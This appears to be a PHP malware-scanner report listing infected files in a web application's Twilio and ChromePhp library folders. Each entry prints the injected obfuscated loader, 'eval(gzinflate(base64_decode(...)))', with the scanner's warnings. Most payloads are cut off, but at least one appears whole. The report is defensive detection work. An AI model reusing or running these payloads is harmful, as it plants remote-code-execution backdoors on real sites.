[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1Ty27bMBC8G9A/7MFAEsMPHdqLghTwoWgN5GAk7tmg6bVFhCIFcmUnKPrvXYqS/Ehih+BBIHdnZmeopJf0JoNB0oMBTA3gq8SSlDVAQr8oswWyQDnCYq+0sjCdz8awyJUH3pQ7uzewz9HgDt1RXYSbz8AhVc54EPAtTcE6+J6mI83V+kA1DtV1R1YKJwpQhqDvSVDlsxr092Ixh3gAGxuJuvbjTk8uaO4X6L3YYsa8eVUIM3Io1mKluc05BmjuL4PVMqRd1zBxrpEvUaqNkg1OuP2aImU2NuBoZV6Cp4V1COHQFaLtmSQ9qYX38IxupyT6ZWRdPqGnn10y+Epo1h4OJ38TThF4xSTDGnBKV4wbt6WT+FE6SygJ16359x/BTuHP02OYYIv0bgoQK1tRpAkGHd6KsQRC78Wb75DETigdQvlcR4DuVJTVSrPzm8rImmu...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1Ty27bMBC8G9A/7MFAEsMPHdqLghTwoWgN5GAk7tmg6bVFhCIFcmUnKPrvXYqS/Ehih+BBIHdnZmeopJf0JoNB0oMBTA3gq8SSlDVAQr8oswWyQDnCYq+0sjCdz8awyJUH3pQ7uzewz9HgDt1RXYSbz8AhVc54EPAtTcE6+J6mI83V+kA1DtV1R1YKJwpQhqDvSVDlsxr092Ixh3gAGxuJuvbjTk8uaO4X6L3YYsa8eVUIM3Io1mKluc05BmjuL4PVMqRd1zBxrpEvUaqNkg1OuP2aImU2NuBoZV6Cp4V1COHQFaLtmSQ9qYX38IxupyT6ZWRdPqGnn10y+Epo1h4OJ38TThF4xSTDGnBKV4wbt6WT+FE6SygJ16359x/BTuHP02OYYIv0bgoQK1tRpAkGHd6KsQRC78Wb75DETigdQvlcR4DuVJTVSrPzm8rImmu...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/SIPListResource.php

Size: 399.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHWPy2rDMBBF9wL/w8XJIjWh2qf0AwJdFDtdG1meNAJFEhqpD0r/vVLrEkLpoN09Z+6oEY2QXdcIdDicDIPzpK1ihj/iwXDqiX2OmlCyzDSDvSX7juSRw6wSfavpRHjq9zj6CDYBcbH4tsayEWriFJVO+Fk+UHwxJR4Pr8YaPw77x6syekvk5r/cFfRRdpcJebJG45idTsY7jKP2rrRlnTZrbQ25tMU6R3Pza9SREj05dSYoayEHEyQKw/VjspwjL2h1cY8Q6XmMFKzStGlXVVm1W7SVbpeGu4sVVCzNu93/5yzwZyPKa8QXyh19B4sBAAA='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPy2rDMBBF9wL/w8XJIjWh2qf0AwJdFDtdG1meNAJFEhqpD0r/vVLrEkLpoN09Z+6oEY2QXdcIdDicDIPzpK1ihj/iwXDqiX2OmlCyzDSDvSX7juSRw6wSfavpRHjq9zj6CDYBcbH4tsayEWriFJVO+Fk+UHwxJR4Pr8YaPw77x6syekvk5r/cFfRRdpcJebJG45idTsY7jKP2rrRlnTZrbQ25tMU6R3Pza9SREj05dSYoayEHEyQKw/VjspwjL2h1cY8Q6XmMFKzStGlXVVm1W7SVbpeGu4sVVCzNu93/5yzwZyPKa8QXyh19B4sBAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPy2rDMBBF9wL/w8XJIjWh2qf0AwJdFDtdG1meNAJFEhqpD0r/vVLrEkLpoN09Z+6oEY2QXdcIdDicDIPzpK1ihj/iwXDqiX2OmlCyzDSDvSX7juSRw6wSfavpRHjq9zj6CDYBcbH4tsayEWriFJVO+Fk+UHwxJR4Pr8YaPw77x6syekvk5r/cFfRRdpcJebJG45idTsY7jKP2rrRlnTZrbQ25tMU6R3Pza9SREj05dSYoayEHEyQKw/VjspwjL2h1cY8Q6XmMFKzStGlXVVm1W7SVbpeGu4sVVCzNu93/5yzwZyPKa8QXyh19B4sBAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/TimeRangeResource.php

Size: 859.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1UXYvbMBB8D+Q/bK+BfOBYKfSpbUJoaeEoB0eaeyol6OyNLWJLQlrHd/T637uynTjNQZdgJGVmdndWaDgYDsRsNhzADO6lQ02QFNJ72BsHlZcZgkNvKpegB8olAT5Z4xEkeKWzAiGVhBFgBuOtSeXzOOJFrvyd0ZTzBilpxNeyopw1v+NRafhcuQPCp0PYrKlWhTJxYspVCy1UgppzQE5kPwiROJSkjsiI0mgfG5eJDuPF3e1WAH9OVH2AEB3VonSxzW2skYSVyYE7Ej/QHZnud9smc2CK4aDt++q/3VaVuJE6w01nAxtAqNPXyIfg1hn1e8jOhkJad0PMYINUOc3eddjEuBT4wxZbo1M2FMiwzQgZt6shYW8z457jk8JZaW2lkyV4coE0OgFhy9zzxuy7EbKoQ4biEWP4xlOQsK+KAs5yTRTKU+AcZaHSk4pCH4EtUPI8PGJTXGqSquSrwkMx3A1d6XTW13Ud96M...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1UXYvbMBB8D+Q/bK+BfOBYKfSpbUJoaeEoB0eaeyol6OyNLWJLQlrHd/T637uynTjNQZdgJGVmdndWaDgYDsRsNhzADO6lQ02QFNJ72BsHlZcZgkNvKpegB8olAT5Z4xEkeKWzAiGVhBFgBuOtSeXzOOJFrvyd0ZTzBilpxNeyopw1v+NRafhcuQPCp0PYrKlWhTJxYspVCy1UgppzQE5kPwiROJSkjsiI0mgfG5eJDuPF3e1WAH9OVH2AEB3VonSxzW2skYSVyYE7Ej/QHZnud9smc2CK4aDt++q/3VaVuJE6w01nAxtAqNPXyIfg1hn1e8jOhkJad0PMYINUOc3eddjEuBT4wxZbo1M2FMiwzQgZt6shYW8z457jk8JZaW2lkyV4coE0OgFhy9zzxuy7EbKoQ4biEWP4xlOQsK+KAs5yTRTKU+AcZaHSk4pCH4E...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1UXYvbMBB8D+Q/bK+BfOBYKfSpbUJoaeEoB0eaeyol6OyNLWJLQlrHd/T637uynTjNQZdgJGVmdndWaDgYDsRsNhzADO6lQ02QFNJ72BsHlZcZgkNvKpegB8olAT5Z4xEkeKWzAiGVhBFgBuOtSeXzOOJFrvyd0ZTzBilpxNeyopw1v+NRafhcuQPCp0PYrKlWhTJxYspVCy1UgppzQE5kPwiROJSkjsiI0mgfG5eJDuPF3e1WAH9OVH2AEB3VonSxzW2skYSVyYE7Ej/QHZnud9smc2CK4aDt++q/3VaVuJE6w01nAxtAqNPXyIfg1hn1e8jOhkJad0PMYINUOc3eddjEuBT4wxZbo1M2FMiwzQgZt6shYW8z457jk8JZaW2lkyV4coE0OgFhy9zzxuy7EbKoQ4biEWP4xlOQsK+KAs5yTRTKU+AcZaHSk4pCH4E...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/TinyHttp.php

Size: 2.19 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVYf2/bNhD9P0C+w9UwKjt1HLvDukJBOqSJ0gRI48w/NmxpoMoybROWJY2kmnhBvvvuSEm2pNjdUKOFZfLu8e7x3ZHK/t7RwcH+HhzAR0+yCUQhDHm4ulQqhqmIljDHJ2kfHc24VO0ZV/Nk3Paj5dG77vvuz7+0tetZFK8En80VvO10uy24YcnSC+H3KJy14ePgHK65z0LJtPXR/t7+nh94UsKAiW84I93hAw945GYrO48+ixXHWNijYuFEgiNEJNbDT88EkkV+GsLlcHgLfsBZqEDNPQVLb8EkCPZ3wqSSZKZN7dgT3hKkEjycQT0R3IbhnMEYkwf8BSqCBB+nkSg4Z46eEN4K6osHT8ykTSubkWgK3mTCKTgvwLFZssRQJMHFlCl+qznTSBDwsfDEqg2nPuWDpK/tPcHsPFj9OYSDgwkbJ7ODA3y+xbgpQ2YyTkOEMcOAGSVNaXFF6xlOi0B+IoIoVlJjbQa/YCt...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVYf2/bNhD9P0C+w9UwKjt1HLvDukJBOqSJ0gRI48w/NmxpoMoybROWJY2kmnhBvvvuSEm2pNjdUKOFZfLu8e7x3ZHK/t7RwcH+HhzAR0+yCUQhDHm4ulQqhqmIljDHJ2kfHc24VO0ZV/Nk3Paj5dG77vvuz7+0tetZFK8En80VvO10uy24YcnSC+H3KJy14ePgHK65z0LJtPXR/t7+nh94UsKAiW84I93hAw945GYrO48+ixXHWNijYuFEgiNEJNbDT88EkkV+GsLlcHgLfsBZqEDNPQVLb8EkCPZ3wqSSZKZN7dgT3hKkEjycQT0R3IbhnMEYkwf8BSqCBB+nkSg4Z46eEN4K6osHT8ykTSubkWgK3mTCKTgvwLFZssRQJMHFlCl+qznTSBDwsfDEqg2nPuWDpK/tPcHsPFj9OYSDgwkbJ7ODA3y+xbgpQ2YyTkO...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVYf2/bNhD9P0C+w9UwKjt1HLvDukJBOqSJ0gRI48w/NmxpoMoybROWJY2kmnhBvvvuSEm2pNjdUKOFZfLu8e7x3ZHK/t7RwcH+HhzAR0+yCUQhDHm4ulQqhqmIljDHJ2kfHc24VO0ZV/Nk3Paj5dG77vvuz7+0tetZFK8En80VvO10uy24YcnSC+H3KJy14ePgHK65z0LJtPXR/t7+nh94UsKAiW84I93hAw945GYrO48+ixXHWNijYuFEgiNEJNbDT88EkkV+GsLlcHgLfsBZqEDNPQVLb8EkCPZ3wqSSZKZN7dgT3hKkEjycQT0R3IbhnMEYkwf8BSqCBB+nkSg4Z46eEN4K6osHT8ykTSubkWgK3mTCKTgvwLFZssRQJMHFlCl+qznTSBDwsfDEqg2nPuWDpK/tPcHsPFj9OYSDgwkbJ7ODA3y+xbgpQ2YyTkO...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Twiml.php

Size: 2.14 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1XbW/bNhD+HiD/4WAYkZwpVtZPgxM7CIJuK9B2Q5Nt3SeDluiIjUQKJOWXdf3vuyOlWLLsNsAqJLFDHu/l4d1zp9OT05P4/Pz0BM7h9SbhpRVKQpIzY2CpNNxzvRIJN/OHtciFoo8iH5N4fHrixQ6K7HTxjeUyNS3tn7+ctqw6cdDclEoaDo9ccs2s0s6Ik7itbKb0BADe86pgEv5U8hGupf+HWWAmK5TmRWVEAqmykKhi5o6+RcdQK57NrC0ncZxozqxYcZQo0N5Y6cc490ImfvfmIQb88+3w4DOFgB5BqZXlieUpDHnOCy7tVbPlI6TnHO7QmNVVYg2wvZDHjdCz8KRkmhVwL4oy5x8RTK/4X6Y128KQ6ccJ3GHoCw5MbkEtexoALsBmHGqXwCpYa1Z29pm1Wiwqyw1tszSlj9ahjrBYgqzyPAIhhRUsF/+QbeBFabfPViQrEIfgQx1Y0GiIa6iqBUINy0omLg/...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW/bNhD+HiD/4WAYkZwpVtZPgxM7CIJuK9B2Q5Nt3SeDluiIjUQKJOWXdf3vuyOlWLLsNsAqJLFDHu/l4d1zp9OT05P4/Pz0BM7h9SbhpRVKQpIzY2CpNNxzvRIJN/OHtciFoo8iH5N4fHrixQ6K7HTxjeUyNS3tn7+ctqw6cdDclEoaDo9ccs2s0s6Ik7itbKb0BADe86pgEv5U8hGupf+HWWAmK5TmRWVEAqmykKhi5o6+RcdQK57NrC0ncZxozqxYcZQo0N5Y6cc490ImfvfmIQb88+3w4DOFgB5BqZXlieUpDHnOCy7tVbPlI6TnHO7QmNVVYg2wvZDHjdCz8KRkmhVwL4oy5x8RTK/4X6Y128KQ6ccJ3GHoCw5MbkEtexoALsBmHGqXwCpYa1Z29pm1Wiwqyw1tszSlj9ahjrBYgqzyPAIhhRUsF/+QbeB...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW/bNhD+HiD/4WAYkZwpVtZPgxM7CIJuK9B2Q5Nt3SeDluiIjUQKJOWXdf3vuyOlWLLsNsAqJLFDHu/l4d1zp9OT05P4/Pz0BM7h9SbhpRVKQpIzY2CpNNxzvRIJN/OHtciFoo8iH5N4fHrixQ6K7HTxjeUyNS3tn7+ctqw6cdDclEoaDo9ccs2s0s6Ik7itbKb0BADe86pgEv5U8hGupf+HWWAmK5TmRWVEAqmykKhi5o6+RcdQK57NrC0ncZxozqxYcZQo0N5Y6cc490ImfvfmIQb88+3w4DOFgB5BqZXlieUpDHnOCy7tVbPlI6TnHO7QmNVVYg2wvZDHjdCz8KRkmhVwL4oy5x8RTK/4X6Y128KQ6ccJ3GHoCw5MbkEtexoALsBmHGqXwCpYa1Z29pm1Wiwqyw1tszSlj9ahjrBYgqzyPAIhhRUsF/+QbeB...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/UsageResource.php

Size: 547.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHVSS08CMRC+b7L/YQIkiwTpHRWJN+MjRvG8KWXYbba0TR9oNP53Z5cFVtQ5NOn0e03bNEkTNhpBmsAInrhDHUAo7j2sjQOuFLx6XuAzCuNW4OOyOUTf4Oc8hpJgd7iVGm6iqxAuq3ozD29SSTMRZjPbQZUUqD0ClCHYKWPCIQ9yS7qbjdF+YlzBWoxnD7cLBrTsqbqCulqqRe4mtrQTjYFZLioKyF7QbYnu80XjXDNZmuxGOTnL25G8iU4g4HtAvfqNupc+HECfJEhl45JCwjpqEaTRUOAB8sg3OBwIWpX8wBVcwZorj2d7al2DUEp/PpPaB64F5prQBMxOrUkz5J2Lzy6OGg5DdBo6TteQdbA+gylksW7kru209K80+XuMPBf0BsFFEWgEJekXjGEQnfyZnhqU1josSNkqLnDY63et+70x9JoGazu9VqczgG1+2XT6v+kxbpP4G2R2jqmkAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHVSS08CMRC+b7L/YQIkiwTpHRWJN+MjRvG8KWXYbba0TR9oNP53Z5cFVtQ5NOn0e03bNEkTNhpBmsAInrhDHUAo7j2sjQOuFLx6XuAzCuNW4OOyOUTf4Oc8hpJgd7iVGm6iqxAuq3ozD29SSTMRZjPbQZUUqD0ClCHYKWPCIQ9yS7qbjdF+YlzBWoxnD7cLBrTsqbqCulqqRe4mtrQTjYFZLioKyF7QbYnu80XjXDNZmuxGOTnL25G8iU4g4HtAvfqNupc+HECfJEhl45JCwjpqEaTRUOAB8sg3OBwIWpX8wBVcwZorj2d7al2DUEp/PpPaB64F5prQBMxOrUkz5J2Lzy6OGg5DdBo6TteQdbA+gylksW7kru209K80+XuMPBf0BsFFEWgEJekXjGEQnfyZnhqU1josSNkqLnDY63et+70x9JoGazu9VqczgG1+2XT...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHVSS08CMRC+b7L/YQIkiwTpHRWJN+MjRvG8KWXYbba0TR9oNP53Z5cFVtQ5NOn0e03bNEkTNhpBmsAInrhDHUAo7j2sjQOuFLx6XuAzCuNW4OOyOUTf4Oc8hpJgd7iVGm6iqxAuq3ozD29SSTMRZjPbQZUUqD0ClCHYKWPCIQ9yS7qbjdF+YlzBWoxnD7cLBrTsqbqCulqqRe4mtrQTjYFZLioKyF7QbYnu80XjXDNZmuxGOTnL25G8iU4g4HtAvfqNupc+HECfJEhl45JCwjpqEaTRUOAB8sg3OBwIWpX8wBVcwZorj2d7al2DUEp/PpPaB64F5prQBMxOrUkz5J2Lzy6OGg5DdBo6TteQdbA+gylksW7kru209K80+XuMPBf0BsFFEWgEJekXjGEQnfyZnhqU1josSNkqLnDY63et+70x9JoGazu9VqczgG1+2XT...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/ChromePhp.php

Size: 3.86 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOUa+1MaSfr3VOV/6FjWgntG0SS3Z7bMHUvQ4AMNKBIsa6oZGujQzMzOQyTZ/O/3fd097xkwblJ1VWclMvR8/b2f3T5/ZgrqeaQxde05u5w6z599ff6MwM/ur7+qB/Ir+c89dYnnu9yahGu76sG0Lc8nvWan27pok0NSebVT29mr/P782fdj+dCsv292jHb9vImY+i8jpl6+pz59GtI/6o3Tq0690TTOmr3mGSIeUnPmu9RkhmD3TDwN79nFMeIS9uRp+2/qHamvBXWtp2FodjoXHUTBXNd2n4bjuHNxfYk4Jq4dOE/D0WofXSAKbo3tv8GF0Wy/jzhpWqO/g6pxcXZWv+w2Y4QNWwjqeOy70Tqu7TPTZyOyaThTx7hnrsdtqxwLt/wVKHw+Z55P5045Auq6dLkCxWfPtkAuCVbVcPBT0ZxVyOE74jExfvtWh+V2Asi0RTC3PAmkMFQEHUIQbCtf3k6EB37xlw6rbCU...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUa+1MaSfr3VOV/6FjWgntG0SS3Z7bMHUvQ4AMNKBIsa6oZGujQzMzOQyTZ/O/3fd097xkwblJ1VWclMvR8/b2f3T5/ZgrqeaQxde05u5w6z599ff6MwM/ur7+qB/Ir+c89dYnnu9yahGu76sG0Lc8nvWan27pok0NSebVT29mr/P782fdj+dCsv292jHb9vImY+i8jpl6+pz59GtI/6o3Tq0690TTOmr3mGSIeUnPmu9RkhmD3TDwN79nFMeIS9uRp+2/qHamvBXWtp2FodjoXHUTBXNd2n4bjuHNxfYk4Jq4dOE/D0WofXSAKbo3tv8GF0Wy/jzhpWqO/g6pxcXZWv+w2Y4QNWwjqeOy70Tqu7TPTZyOyaThTx7hnrsdtqxwLt/wVKHw+Z55P5045Auq6dLkCxWfPtkAuCVbVcPBT0ZxVyOE74jExfvtWh+V2Asi...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUa+1MaSfr3VOV/6FjWgntG0SS3Z7bMHUvQ4AMNKBIsa6oZGujQzMzOQyTZ/O/3fd097xkwblJ1VWclMvR8/b2f3T5/ZgrqeaQxde05u5w6z599ff6MwM/ur7+qB/Ir+c89dYnnu9yahGu76sG0Lc8nvWan27pok0NSebVT29mr/P782fdj+dCsv292jHb9vImY+i8jpl6+pz59GtI/6o3Tq0690TTOmr3mGSIeUnPmu9RkhmD3TDwN79nFMeIS9uRp+2/qHamvBXWtp2FodjoXHUTBXNd2n4bjuHNxfYk4Jq4dOE/D0WofXSAKbo3tv8GF0Wy/jzhpWqO/g6pxcXZWv+w2Y4QNWwjqeOy70Tqu7TPTZyOyaThTx7hnrsdtqxwLt/wVKHw+Z55P5045Auq6dLkCxWfPtkAuCVbVcPBT0ZxVyOE74jExfvtWh+V2Asi...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio.php

Size: 5.16 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 4
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0ba2/bRvJ7gfyHiSBUcmGJtpP0CsVS6nOcxodc4tpKi6I9MBS5sramSIVcWhaK/PebmV2+SVlOcof7cEQrS+TOc+fNzaNvHn1jfffoG/gOThK1CKMRALwVydIJ4JcwuIaAv/+o1tKX4dANl7z2jXRFEAtcvFBqNbIsNxKOkrcCFyzDIB6G0bXl60Wx9c/zqQX4YUCDGyKiQWOE1bgHq8VqiFg8tRBe6GoUIrB8R4lYWQSLH4++mSeBq2QYwJWIbpFCbE8Z3nYSFfqh4/W7ru/E8VtnKfbgL4TDS86hHyezWEWFp/twsA+Hz/bg8Rh6FWy9DJSuSKgkCmDu+LF4rm9/0n+6c+kLGANitiOx8h1X9Ht2bx96Fn4UOHm+ZX1Km0B6BEaLUghDWwaun3gCPBkFiK9v26/O35zZ9h4MoWMxxBA12EGoT6SmeOVnGkFK1zJWIupXxcyW9IgcmYK2hVPaTgEOuL4UgQIVgnL...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ba2/bRvJ7gfyHiSBUcmGJtpP0CsVS6nOcxodc4tpKi6I9MBS5sramSIVcWhaK/PebmV2+SVlOcof7cEQrS+TOc+fNzaNvHn1jfffoG/gOThK1CKMRALwVydIJ4JcwuIaAv/+o1tKX4dANl7z2jXRFEAtcvFBqNbIsNxKOkrcCFyzDIB6G0bXl60Wx9c/zqQX4YUCDGyKiQWOE1bgHq8VqiFg8tRBe6GoUIrB8R4lYWQSLH4++mSeBq2QYwJWIbpFCbE8Z3nYSFfqh4/W7ru/E8VtnKfbgL4TDS86hHyezWEWFp/twsA+Hz/bg8Rh6FWy9DJSuSKgkCmDu+LF4rm9/0n+6c+kLGANitiOx8h1X9Ht2bx96Fn4UOHm+ZX1Km0B6BEaLUghDWwaun3gCPBkFiK9v26/O35zZ9h4MoWMxxBA12EGoT6SmeOVnGkFK1zJ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ba2/bRvJ7gfyHiSBUcmGJtpP0CsVS6nOcxodc4tpKi6I9MBS5sramSIVcWhaK/PebmV2+SVlOcof7cEQrS+TOc+fNzaNvHn1jfffoG/gOThK1CKMRALwVydIJ4JcwuIaAv/+o1tKX4dANl7z2jXRFEAtcvFBqNbIsNxKOkrcCFyzDIB6G0bXl60Wx9c/zqQX4YUCDGyKiQWOE1bgHq8VqiFg8tRBe6GoUIrB8R4lYWQSLH4++mSeBq2QYwJWIbpFCbE8Z3nYSFfqh4/W7ru/E8VtnKfbgL4TDS86hHyezWEWFp/twsA+Hz/bg8Rh6FWy9DJSuSKgkCmDu+LF4rm9/0n+6c+kLGANitiOx8h1X9Ht2bx96Fn4UOHm+ZX1Km0B6BEaLUghDWwaun3gCPBkFiK9v26/O35zZ9h4MoWMxxBA12EGoT6SmeOVnGkFK1zJ...

Function str_rot13 exec_str_rot13 Line: 3 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php rkRP

Function strrev eval_strrev Line: 3 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php lavE

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/km.php

Size: 3.17 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0aXW/bRvI9QP7DRqcLJYSR7fYeDrKVoHCd1sglDRyjL65B0ORS2hNFsrvLOLrW//1mdpfkklxK8rWXAr1jENsi5/trZ4Z6+uTpkygNhSBv3z198svTJwQuIUPJIjKmRR6tiLoWJCvT9JQcHZFS0JgkOSeSCsmyJcmzdEtCuZm1sVe5kKTC9iRfz9ZMiA2VnEViFuWb+d+PvdM2DosJIS2O7edrut35PM2Xon4ech5uJ9M+SBAzbsQ6kpuiK4TMAyFjyjlCSF7SznMwQBDxPFMUkjAVXYCfS8q3Qcoy6pbyx4urj5c/vDcinMzgH8rQAkrKLJIMmLCMyQkq7pNxXuAtsTCaTTWG8ZpCpmkyn1uOW5hbCiNYUiBliPiegvJ8G6cylkWrceMuWghVk8IPDkqN8xbKk32Ixje7eBmomp357ODYeHIXvRqqpljfcdBsvL+LZgVVk6xu9CkyERgNgnvOZHiX0jpoHwajIqa...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0aXW/bRvI9QP7DRqcLJYSR7fYeDrKVoHCd1sglDRyjL65B0ORS2hNFsrvLOLrW//1mdpfkklxK8rWXAr1jENsi5/trZ4Z6+uTpkygNhSBv3z198svTJwQuIUPJIjKmRR6tiLoWJCvT9JQcHZFS0JgkOSeSCsmyJcmzdEtCuZm1sVe5kKTC9iRfz9ZMiA2VnEViFuWb+d+PvdM2DosJIS2O7edrut35PM2Xon4ech5uJ9M+SBAzbsQ6kpuiK4TMAyFjyjlCSF7SznMwQBDxPFMUkjAVXYCfS8q3Qcoy6pbyx4urj5c/vDcinMzgH8rQAkrKLJIMmLCMyQkq7pNxXuAtsTCaTTWG8ZpCpmkyn1uOW5hbCiNYUiBliPiegvJ8G6cylkWrceMuWghVk8IPDkqN8xbKk32Ixje7eBmomp357ODYeHIXvRqqpljfcdBsvL+...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0aXW/bRvI9QP7DRqcLJYSR7fYeDrKVoHCd1sglDRyjL65B0ORS2hNFsrvLOLrW//1mdpfkklxK8rWXAr1jENsi5/trZ4Z6+uTpkygNhSBv3z198svTJwQuIUPJIjKmRR6tiLoWJCvT9JQcHZFS0JgkOSeSCsmyJcmzdEtCuZm1sVe5kKTC9iRfz9ZMiA2VnEViFuWb+d+PvdM2DosJIS2O7edrut35PM2Xon4ech5uJ9M+SBAzbsQ6kpuiK4TMAyFjyjlCSF7SznMwQBDxPFMUkjAVXYCfS8q3Qcoy6pbyx4urj5c/vDcinMzgH8rQAkrKLJIMmLCMyQkq7pNxXuAtsTCaTTWG8ZpCpmkyn1uOW5hbCiNYUiBliPiegvJ8G6cylkWrceMuWghVk8IPDkqN8xbKk32Ixje7eBmomp357ODYeHIXvRqqpljfcdBsvL+...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/lib/ad_ad_lib_funcs.php

Size: 7.58 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

